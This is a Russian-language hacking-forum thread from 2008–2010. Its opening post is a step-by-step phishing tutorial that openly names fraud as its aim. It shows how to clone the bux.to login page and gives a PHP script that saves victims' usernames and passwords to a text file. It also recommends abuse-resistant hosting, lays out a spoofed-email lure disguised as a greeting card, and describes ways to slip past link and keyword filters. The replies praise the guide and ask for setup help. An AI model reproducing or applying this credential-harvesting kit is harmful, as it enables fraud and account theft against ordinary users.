Фейки для тех "кто не въехал" (=
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Фейки для тех "кто не въехал" (= - 2008-08-18 05:53:23.800000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
Fakes.
——
Фейки.
В этой статье ты узнаешь следующее:
[ I.Что такое фейк. ]
[ II.Для чего нужен фейк. ]
[ III.Как сделать свой фейк. ]
[ IV. Как юзать фейк. ]
I
Фейк(fake) - подделка, фальшивка, копия чего-то настроящего.
Сегодя речь пойдет о фейках сайтов, их страниц авторизации.
II
Для чего нужны фейки?
-Такие подделки нам нужны для мошенничества. А именно для фишинг-атак.
Фишинг (англ. phishing, от password — пароль и fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, цель которого — получить идентификационные данные пользователей.
Какие данные мы можем получить?
- Идентификациооные данные. Не только логин и пароль, а так же такие данные, как номера кридитных карт, номера паспартов, именя, фамилии и пр. личные данные. Фейк - не обязятельно копия чего-то существующего, мы можем сами создать свой интернет сайт и использовать его для фишинг-атак на наивных юзеров.
Для чего нам нужны похищенные данные?
- Здесь все понятно, имея чужой логин и пароль мы можем пройти авторизацию на определенных хостах и получить доступ к закрытой\личной информации. Так же мы можем использовать эти данные для того, чтоб пользваться аккаунтами при распространении спама, флуда и тд.
III
Теперь, перейдем к практике) Мы создадим свой фейк. Я буду делать все на примере известного всем сайта - bux.to.
Для начала идем на страницу авторизации.
Открываем ее исходный код. Для начала изменим адрес локальных файлов на полный путь до сайта. Вот кусок кода:
<html>
<head>
<title>bux.to | .view .click .make money</title>
<link rel="stylesheet" type="text/css" href="css.css">
<link rel="shortcut icon" href="images/favicon.gif" type="image/vnd.microsoft.icon" />
<link rel="icon" href="images/favicon.gif" type="image/vnd.microsoft.icon" />
</head> Как мы видим, href="images/favicon.gif" указывает на то, что favicon.gif - локальный файл, значит он располагается в дириктории images, которая находится в свою очередь вместе с исходной страницей.
Пишем полный путь во всех строчках, где обращение идет к локальному файлу.
<link rel="stylesheet" type="text/css" href="[b]http://bux.to/[/b]css.css">
<link rel="shortcut icon" href="[b]http://bux.to/[/b]images/favicon.gif" type="image/vnd.microsoft.icon" /> И вот так меняем все строки.
Теперь, когда мы прописали путь до каждого файла, можно переходить к правке полей авторизации.
Находим строку
<form action="login.php" method="post"> Видим что обращение идет к локальному файлу login.php, оставим его как есть.
Теперь ищем следующие строки:
<td class="midtext">Username:</td><td><input type="text" name="COOKIEusername" size="25" class="form" autocomplete="off"></td Видим что переменная Username(логин) передается под именем COOKIEusername скрипту, я предпочитаю заменить его здесь, но можно и заменить в скрипте, который мы напишем позже.
Меняем COOKIEusername на login.
Теперь ищем строки:
<td class="midtext">Password:</td><td><input type="password" name="COOKIEpass" size="25" class="form" autocomplete="off"></td> Видим что переменная Password передается под именем COOKIEpass, я предпочитаю тоже переиминовать ее на passwd.
Теперь, у нас готова основная часть фейка. Сохраняем все как index.html или login.html - как вам удобно.
Теперь, нам потребуется написать скрипт который будет принимать авторизационные данные и сохранять их в базу данных.
Открываем текстовый редактор, и пишем(копипастим))) следующий код:
<?PHP
$Login = $_POST['login']; // принемаем логин
$Pass = $_POST['passwd']; // принемаем пароль
$log = fopen("base.txt","a+"); // открываем файл базы данных.
fwrite($log,"\n $Login:$Pass \n"); //записываем полученные данные в базу
fclose($log); //закрываем бд.
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://'></head></html>";//здесь мы можем указать куда будет редирекриться жертва после того, как введет логин и пароль.
?>
Теперь сохраняем все это как login.php и кидаем в одну директорию с нашим index.html. Теперь нам нужно создать базу данных - просто текстовый файл) называем его base.txt кладем в ту же директорию. Теперь у нас есть готовый фейк.
IV
Как же теперь поюзать наш свежеизготовленный фейк?
- Все просто. Начитаем с регистрации хостинга. Нам подойдет любой хостинг с поддержкой php. НО! Так как мошенничество - это не самый благой поступок, то нам подойдут только 2 вида хостингов - бесплатный и абузоустойчивый. Если у вас нету абузы, то можно начать с бесплатного и если его прикроют - вы ничего не теряете.
Когда зарегистрировали хостинг, подключаемся к нему по ftp… я юзатю total commander, но вы можете юзать любой другой фтп-менеджер, даже, через веб-интерфейс. Когда залиты все файлы на фтп, нужно выставить на них права(chmod):
Index.html - 775(0775)
Login.php - 775(0775)
base.txt - 777(0777)
Выставили?
- идем через браузер на нашу страничку, открываем http://yoursite.ru/
Видим страницу авторизации…Вводим любые данные в поля, нас редиректит, теперь нужно проверить чтоб все записалось в бд. Идем по адресу http://yoursite.ru/base.txt - видим введенные нами данные) Если же не видем, перечитываем все по новой)
Теперь, у нас есть свой готовый фейк, который установлен на хост и работает!))
Теперь, перейдем к тому, как юзать фейк в плане его впихивания)
Для этого нужно иметь хотя бы минимальные знания соц. инженерии.
Я приведу пример, но никто не запрещает вам его доработать. заменить и тд.
Нам потребуется анонимный мейлер - программа которая может отправлять письма с подменой адреса…разумеется все это легко можно проверить, но мы же будем разводить неопытных юзеров, так что им это будет сложно.
Теперь, мы будем писать письмо от админа\сапорта\etc какого-нибудь сервиса, который юзает наша жертва. Но, мы не можем же наугад написать: "привет, кликни по ссылке, введи логин пас - получи открытку. С уважением, сцуко, админ"
- нет, нам никто не поверит. Поэтому нам нужно зарегистрироваться на этом сервисе. Теперь, ищем что-нить типа открыток, приглашений и тд, которые предоставляются данным сервисом и отправляем себе такую вот открытку. Теперь мы видем нормальный текст:
Здравствуйте!
Пользователь scuko прислал вам открытку "Йа тебя хочу".
Получитьв вашу открытку вы можете по данному адресу http://sukoservis.com/otkritkoforidiots?asdf123234
Кликните по ссылке либо скопируйте ее в адресную строку вашего браузера.
С уважением, Открытки-сервис.ком.
Вот такое вот письмо, теперь, копируем весь текст в мейлер, включаем режим html, и правим следущее. "Йа тебя хочу". меняем на <a href=http://yoursite.ru/>"Йа тебя хочу"</a>
Теперь, при клике на название открытки будет переадрисация на наш фейк. Так меняем еще строку от какого пользователя, и адрес открытки, но адрес открытки меняем тоже тегом "href"… получаем следующее:
Здравствуйте!
Пользователь <a href=http://yoursite.ru/>scuko</a> прислал вам открытку <a href=http://yoursite.ru/>"Йа тебя хочу".</a>
Получитьв вашу открытку вы можете по данному адресу <a href=http://yoursite.ru/>http://sukoservis.com/otkritkoforidiots?asdf123234</a>
Кликните по ссылке либо скопируйте ее в адресную строку вашего браузера.
С уважением, Открытки-сервис.ком.
Разумеется когда письмо будет в формате html все будет отображаться ровно и теги будут скрыты.
Теперь шлем письмо нашей жертве и ждем пополнения в базе данных.
Теперь хотелось бы создать кратенький фак по сабжу. Такие вопросы я всетречаю постояно, так что заранее на них отвечу.
1. Я хочу написать фейк, но вместо 2ух строк там 3\4\n…Как поступить, в скрипте записи бд только 2 строки?!!!
- все просто, нам нужно немного изменить скрипт, а именно, найти в исходном коде страници значение остальных строк, и исправить скрипт следующим образом:
$Login = $_POST['login'];
$Pass = $_POST['passwd'];
$значение нужной строки = $_POST['имя нужной строки'];
fwrite($log,"\n $Login:$Pass:3 строка: 4строка и тд \n");
2. Я создал фейк, но он не работает, вот его адрес
http://super-fake.narod.ru в чем дело???
- дело в хостинге, нам нужен любой хостинг с поддержкой php
Народ.ру никак для этого не подходит. Из бесплатных хостингов могу посоветовать следующие:
http://freehostia.com
http://phpnet.us
http://000webhost.com
http://tu1.ru
3. Я кинул жертве ссылку на фейк, но база данных пуста…в чем проблема???
- Проблема может быть в следующем:
1.Ты неправильно настроил\сделал\etc фейк.
2.Жертва еще не посмотрела ссылку.
3.Жертва не идиот и не стала вводить данные.
4.См. вопр.2
4. Как обойти предупреждение о переходе на внешний ресурс?
- да, часто встречается такая проблема, что при клике по ссылке сервис уведомляет что вы переходите на внешний ресурс и что там не нужно вводить свой логин:пароль и тд. Разберемся как это работает, ведь при переходе по их рекламе нет предупреждений.
Для начала нам нужно определить, как распознаются ссылки на фейки.
а) Анализ письма на такие слова как логин, пароль и тд.
б) Анализ ссылки на сходство с ресурсом.
в) Блочит все без разбору)
Теперь, как это можно обойти.
а) Меняем слово пароль на слово па<html>роль, тег html обработается и не отобразится, и слово будет выглядить нормально, но машине его будет сложнее распознать.
б) Шифрование ссылок, например в hex, таким образом ссылка http://site.com/go?to=http://yoursite.ru
будет выглядить так http://site.com/go?to=http://%79%6F%75%72%73%69%74%65%2E%72%75 в) Здесь все намного сложнее, если сервис блочит все внешние сайты, то нужно искать на нем сомом возможность создания страници и тд, например, некоторые почтовые сервисы предоставляют услуги хостинга, можно создать на их же сервере страничку фейка, но! Почти все такие хостинги не предоставляют php.
На этом все! Надеюсь вам понравилось.
©
зы, знаю что баян и тд, но все же вопросов по этой теме еще много, постарался разжевать так, что даже "йа блондинко" сможет разобраться)
|
|
|
|
|
RE: Фейки для тех "кто не въехал" (= - 2008-08-18 12:38:54.943333
|
|
|
Я Свой
Сообщений: 6
Оценки: 0
Присоединился: 2008-08-16 02:58:22.550000
|
Такие темы - из разряда "чем меньше комментариев, тем лучше". Я имею в виду то, что вообще не должно возникнуть вопросов.
Хотя благодарности ещё никто не отменял.
|
|
|
|
|
RE: Фейки для тех "кто не въехал" (= - 2008-08-18 19:42:09.823333
|
|
|
SeWa_67_RuS
Сообщений: 185
Оценки: 0
Присоединился: 2008-05-23 19:00:34.463333
|
КРАСАВА мОлодец нови4кам полезно !!!!!!!!!! +2
|
|
|
|
|
RE: Фейки для тех "кто не въехал" (= - 2010-04-18 14:29:55.976666
|
|
|
VinDoX_::..BinaryCl_
Сообщений: 8
Оценки: 0
Присоединился: 2010-04-14 11:30:02.483333
|
Где "Открываем ее исходный код" ???у мя последняя опера !
|
|
|
|
|
RE: Фейки для тех "кто не въехал" (= - 2010-04-18 14:34:48.616666
|
|
|
VinDoX_::..BinaryCl_
Сообщений: 8
Оценки: 0
Присоединился: 2010-04-14 11:30:02.483333
|
есть и мозилла …
|
|
|
|
|
RE: Фейки для тех "кто не въехал" (= - 2010-04-18 15:01:22.313333
|
|
|
VinDoX_::..BinaryCl_
Сообщений: 8
Оценки: 0
Присоединился: 2010-04-14 11:30:02.483333
|
Как же теперь поюзать наш свежеизготовленный фейк?
- Все просто. Начитаем с регистрации хостинга. Нам подойдет любой хостинг с поддержкой php. НО! Так как мошенничество - это не самый благой поступок, то нам подойдут только 2 вида хостингов - бесплатный и абузоустойчивый. Если у вас нету абузы, то можно начать с бесплатного и если его прикроют - вы ничего не теряете.
Когда зарегистрировали хостинг, подключаемся к нему по ftp… я юзатю total commander, но вы можете юзать любой другой фтп-менеджер, даже, через веб-интерфейс. Когда залиты все файлы на фтп, нужно выставить на них права(chmod):
Index.html - 775(0775)
Login.php - 775(0775)
base.txt - 777(0777)
все до этого сделал а тут тупик
Когда зарегистрировали хостинг, == где? и бесплатно ли ?
|
|
|
|
|
RE: Фейки для тех "кто не въехал" (= - 2010-04-18 15:37:25.643333
|
|
|
neesooR
Сообщений: 227
Оценки: 0
Присоединился: 2010-03-26 18:05:55.563333
|
Для новичков, в самый раз заслужил +
|
|
|
|
|
RE: Фейки для тех "кто не въехал" (= - 2010-04-18 17:19:42.730000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
quote:
Когда зарегистрировали хостинг, == где? и бесплатно ли ?
че че? ….
Хрена тему подняли …
quote:
18.08.2008
|
|
|
|
|
RE: Фейки для тех "кто не въехал" (= - 2010-04-19 17:46:41.873333
|
|
|
Fill30
Сообщений: 225
Оценки: 0
Присоединился: 2010-03-14 20:27:43.533333
|
познавательно, надеюсь что теперь будет меньше глупых вопросов по фейкам
|
|
|
|
|
|
